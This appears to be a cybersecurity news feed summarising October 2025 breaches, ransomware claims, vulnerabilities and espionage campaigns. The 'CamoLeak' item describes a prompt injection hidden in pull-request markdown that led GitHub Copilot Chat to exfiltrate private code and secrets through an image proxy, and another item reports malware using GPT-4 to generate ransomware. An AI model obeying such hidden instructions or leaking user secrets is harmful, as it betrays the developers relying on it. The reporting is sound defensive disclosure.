Security researchers have discovered and disclosed two critical vulnerabilities, both rated CVSS 10.0, in Red Lion Sixnet series industrial remote terminal units (RTUs). The flaws, CVE-2023-42770 (authentication bypass) and CVE-2023-40151 (remote code execution), can be chained together. An unauthenticated attacker can exploit them over the network to execute arbitrary commands with root privileges on affected devices, which are commonly used in critical infrastructure sectors like energy and water treatment, posing a risk of severe physical disruption.

Oct 16, 20255 min read

New 'LinkPro' Linux Rootkit Uses eBPF and 'Magic Packets' for Ultimate Stealth

Security researchers have uncovered a sophisticated new GNU/Linux rootkit named 'LinkPro' after investigating a compromised AWS environment. The malware demonstrates advanced stealth capabilities by leveraging extended Berkeley Packet Filter (eBPF) modules to hide its processes and files from security tools. Furthermore, it employs a novel activation mechanism, lying dormant until it receives a specially crafted 'magic packet' over the network. The initial intrusion vector was a vulnerable Jenkins server, from which the attackers deployed the rootkit via a malicious Docker image.

Oct 16, 20256 min read

Qilin Ransomware Group Adds New Victims to Leak Site

The Qilin ransomware-as-a-service (RaaS) operation continues its campaign of double extortion, recently adding new victims to its data leak site. Among the latest targets are U.S.-based electrical equipment manufacturer Beta Dyne and Middlesex Appraisal Associates. According to research from Resecurity, the group's operational resilience is bolstered by its use of a global network of bulletproof hosting providers, making its infrastructure difficult to disrupt. The group's continued activity poses a persistent threat to organizations across various sectors, leveraging data encryption and the threat of public data release to pressure victims into paying ransoms.

Oct 16, 20254 min read

Vietnam Airlines Breach: 7.3M Customer Records Exposed in Salesforce Supply Chain Attack

Vietnam Airlines has suffered a massive data breach exposing the records of 7.3 million unique customers. The attack, revealed on October 11, 2025, is attributed to the 'Scattered LAPSUS$ Hunters' hacking group, the same collective behind the recent Qantas breach. The compromise occurred in June 2025 when attackers gained access to the airline's Salesforce-based CRM platform. The stolen data, which includes 7.3 million unique email addresses and other personal details, was released in October. The incident highlights the growing threat of supply chain attacks targeting major software vendors like Salesforce to compromise their extensive client bases. The airline's delayed response has drawn criticism for a lack of transparency.

Oct 15, 20255 min read

Canadian Tire Reveals E-Commerce Data Breach Affecting Multiple Retail Brands

Canadian Tire Corp., a major Canadian retail conglomerate, has reported a data breach affecting its e-commerce customers. Discovered on October 2, 2025, the incident involved unauthorized access to a single database serving multiple brands, including Canadian Tire, SportChek, Mark's/L'Équipeur, and Party City. The exposed data includes customer names, addresses, email addresses, and years of birth. The company stated that financial data and its Triangle Rewards loyalty program were not impacted. For a subset of fewer than 150,000 customers whose full birth dates were exposed, Canadian Tire is offering complimentary credit monitoring services.

Oct 15, 20254 min read

LockBit Ransomware Returns from Hiatus with Upgraded 'Version 5.0'

After a two-month hiatus following law enforcement disruption, the prolific LockBit ransomware group has returned, announcing the release of LockBit 5.0. This new version of the ransomware-as-a-service (RaaS) malware incorporates significant technical upgrades designed to evade detection and analysis. According to researchers, a key new feature is the ability to patch Event Tracing for Windows (ETW), a technique that blinds security monitoring tools by altering in-memory logging. The upgraded malware is designed for cross-platform attacks, targeting Windows, Linux, and VMware ESXi environments, signaling LockBit's intent to reclaim its dominant position in the cybercrime ecosystem.

Oct 15, 20255 min read

Israeli Defense R&D Firm 'MAYA' Targeted in Pro-Resistance Hacktivist Attack

A hacktivist group calling itself the 'Cyber Support Front' has claimed responsibility for a cyberattack against MAYA, an Israeli research and development firm with close ties to the country's Ministry of Defense and major defense contractors like Elbit Systems and Rafael. In a public statement on October 14, the group alleged it had disrupted MAYA's systems and exfiltrated sensitive data, including designs for current and future military equipment. The claims have not been officially confirmed by Israeli authorities, but the incident highlights the ongoing threat of politically motivated cyberattacks against the defense industrial base.

Oct 15, 20254 min read

Fortinet Discloses High-Severity Authenticated RCE Flaw in FortiOS CLI

Fortinet has disclosed a high-severity vulnerability in the command line interface (CLI) of its FortiOS operating system. The flaw could allow an authenticated attacker to execute arbitrary commands on the underlying system. While a CVE identifier has not yet been assigned and specific affected versions are not detailed, the vulnerability poses a significant risk. An attacker with valid CLI credentials could leverage this flaw to gain full control of a Fortinet appliance, bypass security controls, and use the device as a pivot point for further network intrusion. Administrators are urged to monitor for an official security advisory and apply patches as soon as they are available.

Oct 15, 20254 min read

Chinese APT 'Jewelbug' Breaches Russian IT Firm in Supply Chain Threat

In a rare instance of Chinese cyber-espionage targeting a Russian entity, the APT group known as Jewelbug compromised a Russian IT service provider for five months in early 2025. According to Symantec, the attackers gained access to the firm's code repositories and software build systems, creating a significant risk of a software supply chain attack. The group used the powerful ShadowPad backdoor and exfiltrated data to Yandex Cloud to evade detection. This campaign highlights the expanding target scope of Chinese APTs and their focus on compromising trusted providers to enable downstream attacks.

Oct 14, 20255 min read

Fashion Retailer MANGO Discloses Data Breach from Third-Party Vendor

Global fashion retailer MANGO has notified customers of a data breach that originated from a compromise at an external marketing service provider. The incident, disclosed on October 14, 2025, resulted in the unauthorized access of customer contact information, including names, country, postal codes, email addresses, and phone numbers. MANGO has confirmed that its internal systems were not affected and that no sensitive financial data or account credentials were exposed. The company has reported the breach to the Spanish Data Protection Agency (AEPD) and is advising customers to be wary of potential phishing attacks.

Oct 14, 20254 min read

Adobe Patches 35+ Flaws, Including Critical RCE Bug in Connect

As part of its October 2025 security updates, Adobe has released patches for more than 35 vulnerabilities across a dozen products. The most severe of these is a critical cross-site scripting (XSS) vulnerability in Adobe Connect, tracked as CVE-2025-49553, which could lead to arbitrary code execution. The flaw holds a CVSS score of 9.3. Other high-severity flaws were addressed in Adobe Commerce and Magento Open Source. Adobe has assigned a lower priority rating to most updates but recommends that users of Commerce and Magento patch promptly due to a historically elevated risk of attack.

Oct 14, 20254 min read

Massive Botnet of 100k+ IPs Targets U.S. RDP Services

Security researchers at GreyNoise have identified a massive, coordinated botnet campaign targeting Remote Desktop Protocol (RDP) services across the United States. The operation, which began on October 8, 2025, involves over 100,000 unique IP addresses from more than 100 countries. The botnet is using enumeration and timing attacks against RD Web Access and RDP web clients to identify valid user credentials. The widespread and centrally controlled nature of the campaign poses a significant threat to any organization exposing RDP to the internet, as a successful compromise can quickly lead to ransomware deployment or data theft.

Oct 14, 20255 min read

Qilin Ransomware Hits Japanese Beer Giant Asahi, Steals 27GB of Data

The Russia-based Qilin ransomware group has claimed responsibility for a cyberattack that disrupted operations at Asahi Group Holdings, Japan's largest brewing company. The attack, confirmed by Asahi on October 6, impacted order and shipment systems. On its dark web leak site, the Qilin gang stated it exfiltrated 27 gigabytes of sensitive corporate data, including contracts, financial documents, and employee information. The group has posted samples of the stolen data to pressure Asahi into paying the ransom, highlighting the severe risk ransomware poses to manufacturing and supply chain operations.

Oct 14, 20254 min read

Living Off the Land: Hackers Abuse Velociraptor DFIR Tool to Deploy Ransomware

A suspected China-based threat group, Storm-2603, is weaponizing the legitimate open-source digital forensics and incident response (DFIR) tool, Velociraptor. According to Cisco Talos, the attackers are using an outdated and vulnerable version of the tool (exploiting CVE-2025-6264) to gain persistence, escalate privileges, and deploy multiple ransomware families, including Warlock, LockBit, and Babuk. The campaign highlights the growing trend of attackers abusing trusted security tools to evade detection while compromising VMware ESXi and Windows environments.

Oct 13, 20255 min read

Supply Chain Attack Hits Discord: Vendor Breach Exposes 70,000 User IDs

The communication platform Discord has disclosed a significant data breach originating from a third-party customer service vendor, 5CA. The incident, which occurred in early October 2025, resulted in unauthorized access to the sensitive data of approximately 70,000 users who had interacted with Discord's support teams. Exposed information includes photos of government-issued IDs, names, email addresses, IP addresses, and partial billing data. The breach highlights the persistent and growing risk of supply chain attacks, where attackers target less secure partners to access data from larger organizations.

Oct 13, 20254 min read

Ransomware Groups Pivot to Healthcare Vendors, Attacks Surge 30%

A new report from Comparitech reveals a significant strategic shift in ransomware attacks targeting the healthcare sector. While attacks on direct care providers remained steady, incidents involving healthcare-affiliated businesses and vendors surged by 30% in the first nine months of 2025. Threat actors like Qilin and INC are increasingly targeting less-secure partners such as medical billing services and pharmaceutical manufacturers to disrupt the healthcare supply chain, leading to the breach of over 6 million records from confirmed attacks on these adjacent businesses alone.

Oct 13, 20254 min read

Russian APT Seashell Blizzard Targets European Critical Infrastructure

A subgroup of the Russian state-sponsored threat actor Sandworm, tracked as Seashell Blizzard, is conducting a new campaign against critical infrastructure in Ukraine and Europe. The attacks leverage phishing emails with malicious XLL attachments to deliver a custom downloader, CheapShot, which in turn deploys a backdoor called ShroudDoor. The campaign targets organizations in the agricultural, defense, transportation, and manufacturing sectors, highlighting ongoing espionage and disruptive efforts by Russian APTs.

Oct 13, 20254 min read

LastPass Warns of Active Phishing Campaign Impersonating Brand

Password manager LastPass issued an alert on October 13, 2025, about an active phishing campaign targeting its users. The attackers are sending emails from a fraudulent domain with subject lines like "We Have Been Hacked," creating a false sense of urgency to trick users into clicking a malicious link. The link directs victims to a convincing phishing site designed to steal their master password. LastPass has confirmed it was not hacked and is working to take down the malicious infrastructure.

Oct 13, 20254 min read

New Android Spyware "ClayRat" Spreads via Telegram, Hijacks SMS

A new Android spyware named "ClayRat" is targeting Russian users through fake applications distributed on phishing sites and Telegram. The malware uses sophisticated techniques to bypass Android 13+ security restrictions, install itself as the default SMS handler to intercept 2FA codes, and exfiltrate a wide range of data including call logs and photos. A key feature of ClayRat is its self-propagation mechanism, where it automatically sends malicious links via SMS to all contacts on the victim's device, rapidly expanding the infection.

Oct 13, 20254 min read

Ivanti Discloses 13 Vulnerabilities in Endpoint Manager, Two High-Severity

Ivanti has released a security advisory for its Endpoint Manager (EPM) software, detailing 13 new vulnerabilities. The batch includes two high-severity flaws—one allowing for local privilege escalation and another for remote code execution with user interaction—and eleven medium-severity bugs, many of which are SQL injection vulnerabilities. While none of the flaws are known to be actively exploited, Ivanti is urging customers to upgrade from the now end-of-life EPM 2022 to the more secure 2024 version and apply forthcoming patches.

Oct 13, 20254 min read

New York Inflation Refund Program Exploited in Phishing Scams

The New York State Department of Taxation and Finance is warning residents about phishing and smishing (SMS phishing) campaigns that are exploiting a legitimate state inflation relief program. Scammers are sending fraudulent messages claiming that recipients must submit personal and payment information via a malicious link to receive their refund. In reality, the legitimate program sends checks automatically to eligible taxpayers with no action required. The scams use social engineering to create urgency and trick victims into giving up sensitive data.

Oct 13, 20253 min read

Cl0p Exploits Oracle EBS Zero-Day in Widespread Extortion Campaign, FBI Issues Emergency Warning

A financially motivated threat group, claiming ties to the notorious **[Cl0p](https://attack.mitre.org/groups/G0114/)** ransomware gang, has been exploiting a critical zero-day vulnerability in **[Oracle E-Business Suite](https://www.oracle.com/applications/ebs/)** (EBS). The flaw, **CVE-2025-61882**, is an unauthenticated remote code execution vulnerability with a 9.8 CVSS score. Investigations by Google and Mandiant reveal the attackers exploited the flaw since at least August 2025, months before Oracle released a patch on October 4. The campaign involves exfiltrating large volumes of data and sending extortion emails to executives. The **[FBI](https://www.fbi.gov)** has issued an emergency directive urging immediate patching, highlighting the severe risk to sectors like healthcare and education, with Harvard University confirmed as one of the victims.

Oct 13, 20256 min read

Oracle Issues Emergency Patch for High-Severity EBS Flaw Amid Active Clop Attacks

Oracle has released an emergency security patch for a high-severity vulnerability, CVE-2025-61884, in its E-Business Suite (EBS). The flaw, which has a CVSS score of 7.5, allows an unauthenticated, remote attacker to access sensitive data within the Oracle Configurator module. It affects EBS versions 12.2.3 through 12.2.14. This alert is especially critical as it comes while the Clop ransomware group is actively exploiting a separate, critical zero-day (CVE-2025-61882) in EBS for an executive extortion campaign. While there's no confirmed link, the active targeting of EBS by Clop significantly increases the risk that this new vulnerability will be weaponized. Administrators are urged to apply the patch immediately.

Oct 12, 20254 min read

Discord Denies Massive Breach Claim After Hackers Allege 1.5TB Data Leak

Discord is publicly denying claims that it suffered a major data breach. On October 11, 2025, an unknown group of hackers alleged they had exfiltrated and leaked 1.5 terabytes of user data, including highly sensitive government-issued identification documents. Some reports suggested the breach was linked to Discord's Zendesk customer support portal, an allegation Zendesk also refuted, stating its systems were not vulnerable. Discord maintains that its services were not compromised and that the claims are unverified. The significant discrepancy between the hackers' claims and the company's denial leaves the situation unclear, but the mere allegation of leaked IDs poses a serious concern for users.

Oct 12, 20255 min read

North Korean Hackers Shatter Records, Stealing $2 Billion in Crypto in 2025

North Korean state-sponsored hacking groups have stolen over $2 billion in cryptocurrency assets in 2025 so far, marking the largest annual total ever recorded for the regime. A report highlighted on October 11, 2025, points to the increasing scale and sophistication of these financially motivated cyber operations. The single largest heist of the year was the February 2025 attack on the Bybit cryptocurrency exchange, which accounted for $1.46 billion of the total losses. These attacks on crypto exchanges and DeFi platforms are a critical source of revenue for North Korea, allowing it to circumvent international sanctions and fund its weapons programs.

Oct 12, 20255 min read

North Korean IT Worker Fraud Scheme Expands, Targeting 5,000 Companies

A sophisticated North Korean scheme using fraudulent IT worker personas to infiltrate companies has expanded into a massive global operation. According to a report from October 11, 2025, researchers have identified over 130 fake identities used in more than 6,500 job interviews with approximately 5,000 companies over a four-year period. These state-sponsored operatives pose as skilled freelance IT workers to secure remote employment, then use their insider access to conduct espionage, steal intellectual property, and divert funds. The campaign, previously thought to be focused on the U.S., is now confirmed to be global, prompting warnings for businesses to enhance their hiring and verification processes for remote workers.

Oct 12, 20255 min read

Critical RCE Flaw in WooCommerce Designer Pro Plugin Puts WordPress Sites at Risk

A critical vulnerability, CVE-2025-6439, has been disclosed in the WooCommerce Designer Pro WordPress plugin. The flaw, rated 9.8 out of 10 on the CVSS scale, is a path traversal issue that allows an unauthenticated attacker to delete arbitrary files on the web server. This could lead to complete data loss, website destruction, or even remote code execution (RCE) by deleting critical files like wp-config.php and re-running the WordPress installation. The vulnerability affects all versions up to and including 1.9.26 and is also present in the 'Pricom' theme which bundles the plugin. Users are urged to update immediately.

Oct 12, 20254 min read

WordPress Plugin 'Contest Gallery' Vulnerable to CSV Injection Attacks

A medium-severity CSV injection vulnerability, CVE-2025-11254, has been disclosed in the 'Contest Gallery' plugin for WordPress. The flaw affects all versions up to and including 27.0.3. It allows an unauthenticated attacker to embed malicious formulas into data fields that are later exported as a CSV file by a site administrator. If the administrator opens the malicious CSV file in a spreadsheet program like Microsoft Excel, the formulas can execute, potentially leading to arbitrary code execution on their local machine. The vulnerability has a CVSS score of 4.3 and has been patched in version 28.0.0 of the plugin.

Oct 12, 20254 min read

Discord Breach Exposes 5.5M Users via Third-Party Vendor Compromise

Discord has officially confirmed a data breach that originated from a compromised third-party customer support vendor, Zendesk. The incident exposed the data of users who had interacted with Discord's support channels. Hackers claim to have exfiltrated information from 5.5 million users, including usernames, email addresses, IP addresses, and the contents of support tickets. Discord has assured its community that sensitive data such as passwords and authentication tokens were not compromised. In response, Discord has revoked the vendor's system access and is in the process of notifying all affected individuals, highlighting the persistent risks associated with third-party supply chain security.

Oct 11, 20255 min read

175 Malicious NPM Packages Target Developers in Widespread Phishing Attack

A significant software supply chain attack has been identified on the npm open-source repository, where researchers discovered 175 malicious packages that were downloaded approximately 26,000 times. These packages were trojanized to execute credential phishing attacks against developers, aiming to steal logins and API keys. The campaign, which primarily targeted the technology and energy sectors, often used typosquatting techniques to mimic legitimate packages. This incident highlights the critical need for organizations to implement stringent dependency vetting and runtime security monitoring to defend against attacks targeting the software development lifecycle.

Oct 11, 20255 min read

New 'Chaosbot' Malware Weaponizes Cisco VPN & AD Credentials for Lateral Movement

A new malware strain named "Chaosbot" has been discovered by security researchers. It specializes in using stolen Cisco VPN and Active Directory credentials to execute commands and move laterally within compromised corporate networks. By leveraging legitimate enterprise tools and protocols, this 'living off the land' technique makes the malware's activity difficult to distinguish from normal administrative behavior. Chaosbot represents a significant threat for establishing persistence, escalating privileges, and deploying secondary payloads like ransomware.

Oct 11, 20255 min read

New 'Stealit' Malware Targets Developers via Malicious Node.js Extensions

A new information-stealing malware named "Stealit" is targeting Windows systems by using malicious Node.js extensions as its infection vector. This novel approach specifically targets software developers, aiming to steal sensitive data such as source code, API keys, and other credentials directly from their development environments. The emergence of Stealit highlights an increasing focus by threat actors on compromising the software supply chain at its source, turning trusted development tools into attack vectors.

Oct 11, 20255 min read

'MalTerminal' Malware Uses OpenAI's GPT-4 to Auto-Generate Ransomware Code

Researchers have discovered "MalTerminal," a novel malware that uses OpenAI's GPT-4 large language model (LLM) to dynamically generate ransomware code. This represents a significant and dangerous evolution in malware development, enabling the creation of polymorphic code that can evade traditional signature-based detection. The technique dramatically lowers the barrier for less-skilled actors to create sophisticated attacks and poses a major new challenge for cybersecurity defenses, requiring a shift towards behavioral analysis and anomaly detection.

Oct 11, 20256 min read

Juniper Networks Patches 220 Flaws, Including Nine Critical Bugs Dating Back Years

Juniper Networks has released a massive security update for October 2025, addressing a total of 220 vulnerabilities across its broad portfolio of networking products. The patch bundle includes fixes for nine flaws rated as critical, posing a severe risk of remote code execution or system takeover. Alarmingly, analysis suggests some of these vulnerabilities have existed in products since at least 2019, creating a long window of exposure for potential exploitation. Customers are urged to review the advisories and apply the necessary updates with extreme urgency.

Oct 11, 20255 min read

Cl0p Ransomware Exploits Oracle E-Business Suite Zero-Day in Mass Attack

The notorious Cl0p ransomware gang is conducting a widespread extortion campaign by exploiting a critical, unauthenticated remote code execution (RCE) zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite. The campaign, active since at least August, involves Cl0p breaching vulnerable systems to steal data and then sending extortion emails to thousands of accounts. Oracle has released an emergency patch for the flaw, which affects versions 12.2.3 through 12.2.14, and is urging customers to update immediately. This attack follows Cl0p's established pattern of leveraging high-impact zero-days in enterprise software for mass compromise.

Oct 10, 20255 min read

GitHub Patches 'CamoLeak' Flaw in Copilot That Allowed Silent Code and Secret Exfiltration

A critical vulnerability, dubbed 'CamoLeak,' has been discovered and patched in **[GitHub Copilot Chat](https://github.com/features/copilot)**. The flaw, rated 9.6 CVSS by researcher Omer Mayraz of Legit Security, allowed attackers to silently steal private source code, API keys, and other secrets from developers' repositories. The attack involved a novel prompt injection technique where malicious instructions were hidden in a pull request's markdown. When a developer used Copilot to review the PR, the AI would execute the hidden commands. The stolen data was then exfiltrated character-by-character using a clever trick involving **[GitHub](https://github.com/)**'s own image proxy service, Camo, bypassing standard security controls. GitHub has mitigated the flaw by disabling image rendering in Copilot Chat.

Oct 10, 20255 min read

Crypto Platform Shuffle.com Discloses Major Data Breach via Third-Party CRM Provider

Crypto betting platform **[Shuffle.com](https://shuffle.com/)** has confirmed a significant data breach affecting a majority of its users. The incident occurred not on Shuffle's own systems, but at its third-party CRM provider, **Fast Track**. On October 10, Shuffle announced that attackers compromised Fast Track and gained access to a trove of sensitive user data. The exposed information includes full names, emails, phone numbers, home addresses, transaction histories, and, most critically, Know Your Customer (KYC) identity documents like passports and driver's licenses. While user funds and passwords are safe, the breach creates a severe risk of identity theft and targeted phishing for affected customers. Shuffle has revoked the provider's access and is urging users to enable 2FA.

Oct 10, 20255 min read

New 'White Lock' Ransomware Emerges, Demanding 4 Bitcoin and Threatening Data Leaks

A new ransomware strain named **White Lock** has been identified by cybersecurity researchers. Operating as a double-extortion threat, the malware first exfiltrates sensitive data before encrypting files on the victim's Windows system, appending the `.fbin` extension. A ransom note, `c0ntact.txt`, is dropped in each affected folder, demanding a payment of 4 Bitcoin within a stringent four-day deadline. The operators threaten to notify the victim's customers, sell the stolen data to competitors, and ultimately leak it publicly if the ransom is not paid. Victims are instructed to use the **[Tor](https://www.torproject.org/)** browser to communicate with the attackers, suggesting a focus on high-value enterprise targets.

Oct 10, 20255 min read

Humiliation for Pro-Russian Hackers 'TwoNet' After Attacking Decoy Water Utility Honeypot

The pro-Russian hacktivist group **TwoNet** has been publicly embarrassed after cybersecurity firm **[Forescout](https://www.forescout.com/)** revealed the group was duped into attacking a sophisticated decoy system. In September, TwoNet boasted on Telegram about disrupting a Dutch water utility's control systems. However, Forescout's research, published on October 10, confirmed the 'attack' was against one of their industrial control system (ICS) honeypots. The attacker, 'Barlati,' gained access using default credentials (`admin`/`admin`), defaced the HMI, and changed settings, believing it was a real facility. The incident highlights the naivety of some hacktivist groups and provides valuable intelligence on their TTPs against critical infrastructure.

Oct 10, 20255 min read

New Chinese APT 'Phantom Taurus' Targets Global Geopolitical Intel with 'NET-STAR' Malware

A newly designated, sophisticated threat group aligned with China, named **Phantom Taurus**, has been identified conducting long-term cyber-espionage campaigns. Active for over two years, the group targets government, military, and telecommunications organizations across Africa, the Middle East, and Asia. Its operations focus on strategic intelligence gathering that aligns with China's geopolitical interests. **Phantom Taurus** is distinguished by its stealth and use of a custom malware suite called **NET-STAR**, which targets **[Microsoft Internet Information Services (IIS)](https://www.iis.net/)** servers. While showing some infrastructure overlap with known APTs like **[APT27](https://attack.mitre.org/groups/G0045/)** and **[Mustang Panda](https://attack.mitre.org/groups/G0129/)**, its unique tools and TTPs mark it as a distinct and advanced threat.

Oct 10, 20256 min read

Killsec Ransomware Claims Attack on Indonesian FinTech WalletKu, Threatens to Leak KYC Data

The **Killsec** ransomware group has claimed responsibility for an attack on **WalletKu Indompet Indonesia**, a financial technology firm based in Jakarta. WalletKu provides a digital payment application primarily for micro, small, and medium enterprises. According to a post on an underground forum, Killsec has compromised the company and is threatening to release a significant amount of sensitive customer data. The exposed data reportedly includes Know Your Customer (KYC) information, such as full names, photos, government-issued IDs, and addresses. The attack highlights the growing trend of ransomware groups targeting FinTech companies, where the theft of KYC data poses a severe risk of identity theft and fraud for customers.

Oct 10, 20255 min read

'Datzbro' Android Trojan Targets Seniors in Global AI-Powered Facebook Scam

A global malicious campaign is using AI-generated content to create fake **[Facebook](https://www.facebook.com/)** groups that target seniors. The campaign, detailed in a CYFIRMA report, sets up convincing-looking communities for social events to lure victims into downloading a malicious Android application. This app is a potent banking trojan and spyware known as **Datzbro**. The malware can grant attackers full remote control of the device, enabling them to record audio and video, steal files, and use phishing overlays to capture banking credentials. The campaign has been observed targeting users in Australia, Canada, the UK, and Southeast Asia. The threat is amplified by the fact that the builder for the Datzbro trojan was previously leaked online, allowing any criminal to use it.

Oct 10, 20255 min read

Perfect 10.0 CVSS Flaw in GoAnywhere MFT Exploited by Medusa Ransomware Group

Microsoft has linked the cybercrime group Storm-1175, known for deploying Medusa ransomware, to the active exploitation of a critical vulnerability in Fortra's GoAnywhere Managed File Transfer (MFT) solution. The flaw, CVE-2025-10035, is an unauthenticated remote code execution vulnerability with a perfect 10.0 CVSS score. Storm-1175 has been exploiting this zero-day since at least September 11, 2025, to compromise organizations in finance, healthcare, and technology, deploying backdoors and RMM tools before exfiltrating data and deploying ransomware.

Oct 9, 20255 min read

Phishing Campaign Lures Marketing Professionals with Fake Jobs at Tesla, Google

Security firm Cofense has detailed a sophisticated phishing campaign that targets marketing and social media professionals with fake job opportunities from high-profile brands like Tesla, Google, Ferrari, and Red Bull. The campaign uses realistic emails and multi-step credential harvesting portals to trick victims. Unlike typical phishing attacks, the primary goal is to collect detailed resumes and other personally identifiable information (PII). This data can then be used by threat actors to craft more convincing social engineering attacks, bypass security questions, or commit identity theft.

Oct 9, 20254 min read

Financial Firms Tie CEO Pay to Cyber Performance Amid Budget Hikes, Moody's Finds

A new report from Moody's indicates a significant shift in how financial and insurance firms are managing cyber risk. Companies are increasing cybersecurity spending, with nearly half dedicating 8% or more of their IT budget to cyber. Governance is also strengthening, as 40% of firms now link CEO compensation directly to cybersecurity performance, up from 24% in 2023. Furthermore, CISO briefings to the board are becoming more frequent, and firms are maturing their operational readiness with annual incident response tests and daily data backups.

Oct 9, 20253 min read

Expert Advice on Securing Critical Infrastructure with Limited Budgets

In a recent podcast, cybersecurity expert Chetrice Romero from Ice Miller provided guidance for leaders responsible for protecting critical infrastructure, particularly those facing limited budgets. The discussion covered common cyber and physical threats to utilities, the need for scalable and resilient strategies, and practical advice for maximizing security investments. Key recommendations included embracing cloud-native platforms for efficiency and designing future-proof command centers, offering actionable insights for securing essential systems in a challenging economic environment.

Oct 9, 20253 min read

Clop Exploits Critical Oracle Zero-Day; CISA Issues Emergency Patch Directive

Multiple international cybersecurity agencies, including CISA, the UK's NCSC, and Singapore's CSA, have issued urgent warnings about a critical zero-day vulnerability, CVE-2025-61882, in Oracle E-Business Suite. The flaw, which has a CVSS score of 9.8, is being actively exploited by the Clop ransomware group in a campaign that began in August 2025. The attackers are leveraging the vulnerability to exfiltrate corporate data and are now sending extortion emails to executives of victim organizations. CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by October 28, 2025, highlighting the extreme risk posed by this unauthenticated remote code execution flaw.

Oct 8, 20255 min read

Qilin Ransomware Claims Disruptive Attack on Japanese Beverage Giant Asahi

The Russia-based Qilin ransomware group has claimed responsibility for a significant cyberattack against Asahi Group Holdings, one of Japan's largest beverage companies. The attack, first disclosed in late September 2025, caused major operational disruptions, forcing the suspension of order and shipment systems. On October 7, Qilin added Asahi to its data leak site, alleging the theft of 27 gigabytes of sensitive data, including contracts and employee information. Asahi is still working to restore its systems, highlighting the vulnerability of manufacturing and supply chain operations to ransomware.

Oct 8, 20254 min read

Microsoft Warns of Attackers Abusing Teams for Session Hijacking

Microsoft has issued a warning about a threat actor group, tracked as Storm-2372, that is abusing legitimate Microsoft Teams features for cyberattacks. In a report on October 7, 2025, Microsoft detailed how the group uses social engineering within Teams chats and file sharing to deliver malware, trick users into fraudulent authentication flows, and ultimately steal access tokens to hijack user sessions. The attacks are effective because they originate from within the trusted Teams environment, making users more likely to fall for the lures.

Oct 8, 20254 min read

Red Hat Consulting GitLab Breached; ShinyHunters Leaks Sensitive Client Data

Red Hat has confirmed a security breach affecting an internal GitLab server used by its consulting division. A group named 'Crimson Collective,' in collaboration with the notorious extortion group 'ShinyHunters,' claims to have stolen 570GB of data from over 28,000 repositories. The stolen data allegedly includes highly sensitive 'Customer Engagement Reports' containing network diagrams, configurations, and access details for over 800 organizations, including Bank of America, Verizon, and the U.S. National Security Agency. While Red Hat states the breach was contained and did not impact its product supply chain, the incident represents a massive supply chain risk for its clients.

Oct 8, 20255 min read

Methodist Homes Discloses Healthcare Data Breach Affecting Nearly 26,000

Methodist Homes of Alabama & Northwest Florida, a senior living and healthcare provider, announced on October 8, 2025, that it suffered a data breach affecting 25,579 individuals. The incident, which occurred over a 12-day period in October 2024, resulted in unauthorized access to sensitive personal and protected health information (PHI). The compromised data includes names, Social Security numbers, driver's license numbers, and detailed clinical information. The organization's disclosure comes nearly a year after the initial detection of the breach.

Oct 8, 20254 min read

Critical RCE Flaw (CVE-2025-53967) Patched in Figma AI Tool

A high-severity command injection vulnerability, CVE-2025-53967, has been discovered and patched in the 'figma-developer-mcp' Model Context Protocol server, a tool used with the Figma design platform. The flaw, rated with a CVSS score of 7.5, could allow an unauthenticated attacker to achieve remote code execution (RCE) on a server running the tool. The vulnerability, discovered by Imperva, stemmed from the unsanitized use of user input in command-line strings. Users are urged to update to the patched version to mitigate the risk of server compromise.

Oct 8, 20254 min read

Google Rolls Out October 2025 Security Update for Pixel Devices

Google has released its scheduled October 2025 security update for all supported Pixel devices. The update, detailed in the Pixel Update Bulletin on October 8, 2025, addresses numerous security vulnerabilities. It incorporates all patches from the broader October 2025 Android Security Bulletin, along with additional fixes for flaws specific to Pixel hardware components. Google urges all Pixel users to accept the over-the-air (OTA) update to protect their devices from potential exploitation.

Oct 8, 20253 min read

Atos Partners with Qevlar AI to Deploy "Virtual SOC Analyst"

On October 7, 2025, the global digital transformation and cybersecurity firm Atos announced a strategic partnership with Qevlar AI. The collaboration will integrate Qevlar's 'Virtual SOC Analyst,' an agentic AI technology, into Atos's global network of 17 Security Operations Centers (SOCs). The goal is to automate routine and intermediate security alert investigations, allowing Atos's human analysts to focus on more complex tasks like proactive threat hunting. The partnership aims to enhance operational efficiency for Atos's 2,000+ managed security customers.

Oct 8, 20253 min read

SonicWall Breach Escalates: 100% of Cloud Backups Confirmed Stolen

Firewall vendor SonicWall has dramatically escalated the severity of a recent data breach, confirming that an investigation found that 100% of customers using its cloud backup service had their firewall configuration files stolen. This admission, made on October 6, 2025, after an investigation with Mandiant, starkly contrasts with the company's initial September statement that only 5% of its user base was affected. The stolen files, accessed via the MySonicWall portal, contain sensitive network architecture details and encrypted credentials, posing a significant reconnaissance risk for future attacks against all affected customers.

Oct 8, 20255 min read

New 'Scattered Lapsus$ Hunters' Gang Extorts 39 Salesforce Customers on Leak Site

A new cybercriminal collective calling itself 'Scattered Lapsus$ Hunters' has emerged, claiming to be a merger of members from Scattered Spider, Lapsus$, and ShinyHunters. The group launched a dark web data leak site over the weekend of October 4-5, listing 39 major companies, including Cisco, Toyota, and Marriott, as victims of a massive data breach affecting their Salesforce instances. The actors claim to have exfiltrated nearly one billion records and have set an October 10 deadline for ransoms to be paid. In an unusual tactic, they have also demanded that Salesforce pay a ransom to spare the listed victims, threatening to release documents proving alleged security negligence. The breaches are suspected to have originated from vishing attacks targeting IT help desks.

Oct 8, 20255 min read

CISA Adds Actively Exploited Zimbra XSS Zero-Day (CVE-2025-27915) to KEV Catalog

On October 7, 2025, CISA added CVE-2025-27915, a high-severity zero-day vulnerability in the Zimbra Collaboration Suite (ZCS), to its Known Exploited Vulnerabilities (KEV) catalog. The flaw is a stored cross-site scripting (XSS) issue in the ZCS Classic Web Client that can be triggered with no user interaction beyond viewing a malicious email. An attacker can craft a malicious iCalendar invitation that, when processed, executes arbitrary JavaScript in the victim's authenticated session. This allows for account takeover, data exfiltration, and redirection of sensitive emails. Federal agencies are mandated to apply mitigations by October 28, 2025.

Oct 8, 20254 min read

Signal Threatens to Exit EU Market if "Chat Control" Mass Surveillance Bill Passes

